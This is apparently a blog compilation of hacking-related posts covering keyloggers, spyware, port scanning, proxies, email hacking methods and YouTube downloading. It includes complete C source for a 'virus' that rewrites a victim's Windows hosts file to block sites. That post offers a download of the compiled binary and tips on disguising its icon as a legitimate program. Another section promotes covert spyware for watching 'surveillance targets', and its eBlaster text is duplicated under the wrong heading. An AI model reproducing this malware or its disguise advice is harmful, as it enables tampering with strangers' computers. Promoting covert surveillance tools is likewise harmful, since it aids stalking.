• Educate your users not to install applications downloaded from the internet and e-mail attachments.

Read More

Keyloggers (Keystroke Loggers)

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

There are two types of keystroke loggers:

1. Software based and

2. Hardware based.

Spy ware: Spector (http://www.spector.com/)

• Spector is a spy ware and it will record everything anyone does on the internet.


• Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.


• Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer’s hard drive.

Hacking Tool: eBlaster (http://www.spector.com/)

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)

 

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)

<

The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

Read More

Port Scanning

Port Scanning is one of the most popular techniques used by hackers to discover services that can be compromised.

• A potential target computer runs many ’services’ that listen at ‘well-known’ ‘ports’.


• By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited.


• Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.

Port Scanning Techniques

Port Scanning Techniques can be broadly classified into:

• Open scan


• Half- open scan


• Stealth scan


• Sweeps


• Misc

Commonly used tools for port scanning

1.Tool: SuperScan 3.0

 

 

 

 

 

 

 

 

2. Tool: NMap (Network Mapper)

3. Tool: NetScan Tools Pro 2003

4. Tool: ipEye, IPSecScan

Read More

Proxy Servers and Anonymizers

Proxy is a network computer that can serve as an intermediate for connection with other computers. They are usually used for the following purposes:

 

• As firewall, a proxy protects the local network from outside access.


• As IP-addresses multiplexer, a proxy allows to connect a number of computers to Internet when having only one IP-address.


• Proxy servers can be used (to some extent) to anonymize web surfing.


• Specialized proxy servers can filter out unwanted content, such as ads or ‘unsuitable’ material.


• Proxy servers can afford some protection against hacking attacks.

Anonymizers

• Anonymizers are services that help make your own web surfing anonymous.


• The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.


• An anonymizer removes all the identifying information from a user’s computers while the user surfs the Internet, thereby ensuring the privacy of the user.

Read More

Creating a Virus to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site.If you are curious about creating such a virus on your own, then you are in the right place.Tody I’ll teach you how to create a simple virus that block’s websites.And as usual I’ll use my favorite programming language ‘C’ to create this website blocking virus.I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’.So, anyone with a basic knowledge of C will be able to understand the working of the virus.This virus need’s to be clicked only once by the victim.Once it is clicked, it’ll block a list of websites that has been specified in the source code.The victim will never be able to surf those websites unless he re-install’s the operating system.This blocking is not just confined to IE or Firefox.So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually.But, here I have created a virus that automates all the steps involved in blocking.The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include<stdio.h>

#include<dos.h>

#include<dir.h>

char site_list[6][30]={

“google.com”,

“www.google.com”,

“youtube.com”,

“www.youtube.com”,

“yahoo.com”,

“www.yahoo.com”

};

char ip[12]=”127.0.0.1″;

FILE *target;

int find_root(void);

void block_site(void);

int find_root()

{

int done;

struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

/*to determine the root drive*/

if(done==0)

{

target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

/*to open the file*/

return 1;

}

else return 0;

}

void block_site()

{

int i;

fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);

for(i=0;i<6;i++)

fprintf(target,”%s\t%s\n”,ip,site_list[i]);

fclose(target);

}

void main()

{

int success=0;

success=find_root();

if(success)

block_site();

}

How to Compile ?

1. Download the source code here. Download the compiled module(virus) here.

2. Compile the sourcecode using any C/C++ compiler.

3. To test, run the compiled module. It will block the sites that is listed in the source code.

4. Once you run the file block_Site.exe, restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

4. To remove the virus type the following the Run.

%windir%\system32\drivers\etc

5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

6. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post:How to Change the ICON of an EXE file ?

Read More

Common Terminologies used in Internet Security

If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.

Firewall – is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.

Hacker – can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.

IP spoofing – is an attempt to access your system by pretending like another system. This is done by setting up a system with an IP address that you normally trust.

Sniffing – is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.

Trojan horse - a program pretending like useful software, while its actual strategy is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.

Virus – is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.

Worm - A worm is almost similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

Read More

Tips to improve Email Privacy

Many websites ask for your email address when you shop online, download a free software etc. But do you know that this has a chance of affecting your email privacy through Spam emails?

Though most websites don’t use spamming as an email marketing strategy, there are a few that use junk emails that don’t care about anti-Spam laws. Here are some tips to maintain your email privacy from such threats.

Before submitting your email address you need to check the reputation of the company. Reputed websites would normally follow the right email practices to ensure your email privacy. Such companies will never want to loose their hard earned reputation by getting blammed for spamming.

See whether the websites provides email privacy statements. You need to go through these statement in detail, and know about the kind of emails that will be sent to you, how often etc. Based on this you can decide on whether you need such emails. You don’t want to give your email address to some fraud company that is thinking about handing over your email address to hundreds of other websites.

Finally, check whether the website really respects your privacy. Often you will find some text like “I agree to receive email” that comes with a check box. You can agree to receive emails by checking the check box. If the check box is already checked, it is just a good indication that the website doesn’t respect your privacy. So watch out!

Read More

Common Email Hacking methods

Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.

Hackers can install key logger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details. Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).

Another way of getting your password is the use of fake login pages that look exactly like the real one. So, beware of the webpages you visit. Also if you find your computer behaving oddly, there is a chance that some spy program is running. On such occasions it is better to try and remove the malware or reformat the entire hard disk.A detailed Email Hacking tutorial is discussed in the post Hacking an email account.

Before leaving you should definitely consider reading my latest post Hacking Yahoo, Gmail or any other Password which covers the real ways of professional hacking.

Read More

How to Download Videos from Youtube

Here is the most easiest way to download videos from Youtube and convert it into other formats.Most of the sites give you some confusing way to download videos from Youtube, but here is an easy way.Here is step-by-step guide to download videos from Youtube.

STEP-1. DOWNLOADING THE VIDEO FROM YOUTUBE

Basically the video that you want to download from Youtube will be in the .flv format.So first, when you download videos from Youtube, it will be saved in .flv format. 

Once you get the video URL,  you can use any one of the following sites/plugins to download Youtube videos .

• Download Youtube Videos - Download Youtube Videos is one of the most widely site to download videos from Youtube in the .flv format.Here you’ll see a box to enter the download URL.Just enter the URL here and click on download to save the video.


• KissYouTube - KissYouTube offers an easiest way to download videos from Youtube.Just visit the site and you’ll find a box to enter the video URL.In this box enter the URL of the video you want to download and click on GO.Next you will see a Download Button.Click on the download button and save the Youtube video with the extension as .flv .


•  Download Helper - Download Helper is an excellent firefox plugin to download videos from Youtube.


• My Video Downloader - MyVideo Downloader will Download and convert videos from many sites, not just YouTube.

 

STEP-2. CONVERTING THE YOUTUBE VIDEO FROM .FLV TO OTHER FORMATS

Once you download the video ,you can use any of the freely available/commercial video conversion softwares.But here in this tutorial I prefer OJOsoft Total Video Converter to convert the downloaded Youtube video.The speciality of this video converter is that it supports almost all the formats.Once you convert the Youtube downloaded video to MPEG format you’ll be able to play it with Windows Media Player.

Read More